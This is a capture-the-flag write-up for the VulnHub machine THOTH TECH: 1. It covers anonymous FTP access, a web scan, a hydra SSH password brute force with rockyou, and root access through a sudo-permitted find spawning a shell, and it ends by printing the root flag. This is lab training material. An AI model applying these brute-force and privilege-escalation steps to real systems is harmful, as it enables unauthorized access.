This is THOTH TECH: 1 from VulnHub.

There is no information about this box. I’ve been banging on a few and not getting them completed lately so not many writeups. This one was easy and will be brief. I did complete the latest HTB machine Previse the other day but no write-up on that.

Ports

FTP, SSH and HTTP.

FTP

We have anonymous login, one file only and no upload:

┌──(root💀kali)-[/opt/vulnhub/thoth]
└─# ftp 192.168.1.87                                                                                        
Connected to 192.168.1.87.
220 (vsFTPd 3.0.3)
Name (192.168.1.87:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -lash
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 65534    65534        4096 Jul 02 09:33 .
drwxr-xr-x    2 65534    65534        4096 Jul 02 09:33 ..
-rw-r--r--    1 0        0             110 Jul 02 09:33 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (110 bytes).
226 Transfer complete.
110 bytes received in 0.00 secs (52.2226 kB/s)
ftp> quit
221 Goodbye.

The file says:

Dear pwnlab,
My name is jake. Your password is very weak and easily crackable, I think change your password.

HTTP

python3 /opt/dirsearch/dirsearch.py -u http://192.168.1.87

Dirsearch turns up only a few things, one of which is wordpress and another is test.php which only displays ‘hi guys’. Could we break the wordpress password? Perhaps an LFI?

wpscan says:

Scan Aborted: The URL supplied redirects to http://192.168.1.8/wordpress/. Use the –ignore-main-redirect option to ignore the redirection and scan the target, or change the –url option value to the redirected URL.

Okay then, let’s use –ignore-main-redirect

wpscan -e --url http://192.168.1.87/wordpress --api-token GET_YOUR_OWN_ITS_FREE --ignore-main-redirect

Scan Aborted: The remote website is up, but does not seem to be running WordPress.

Whatever. It’s constantly trying to redirect to http://192.168.1.8. I can have a look at the page and sure enough there is blog post by pwnlab. What else can we try?

┌──(root💀kali)-[/opt/vulnhub/thoth]
└─# hydra -l pwnlab -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.87
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-08-14 07:02:38
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.1.87:22/
[STATUS] 160.00 tries/min, 160 tries in 00:01h, 14344240 to do in 1494:12h, 16 active
[22][ssh] host: 192.168.1.87   login: pwnlab   password: babygirl1
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-08-14 07:04:22

Ok then.

GTFOBins root

Yes, that easy.

┌──(root💀kali)-[/opt/vulnhub/thoth]
└─# ssh pwnlab@192.168.1.87                                                                                                      255 ⨯
The authenticity of host '192.168.1.87 (192.168.1.87)' can't be established.
ECDSA key fingerprint is SHA256:Pw4/N+COKqnBrc/qv/3XYzmwPBCJYBwbDtx9hHOxdA8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.87' (ECDSA) to the list of known hosts.
pwnlab@192.168.1.87's password: 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 System information disabled due to load higher than 1.0

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

66 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Fri Jul  2 09:14:12 2021 from 192.168.1.11
pwnlab@thothtech:~$ sudo -l
Matching Defaults entries for pwnlab on thothtech:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pwnlab may run the following commands on thothtech:
    (root) NOPASSWD: /usr/bin/find
pwnlab@thothtech:~$ sudo -u root /usr/bin/find . -exec /bin/sh \; -quit
# id;hostname;date
uid=0(root) gid=0(root) groups=0(root)
thothtech
Sat 14 Aug 2021 11:10:22 AM UTC
# cd /root
# ls
root.txt  snap
# cat root.txt
Root flag: d51546d5bcf8e3856c7bff5d201f0df6

good job :)
#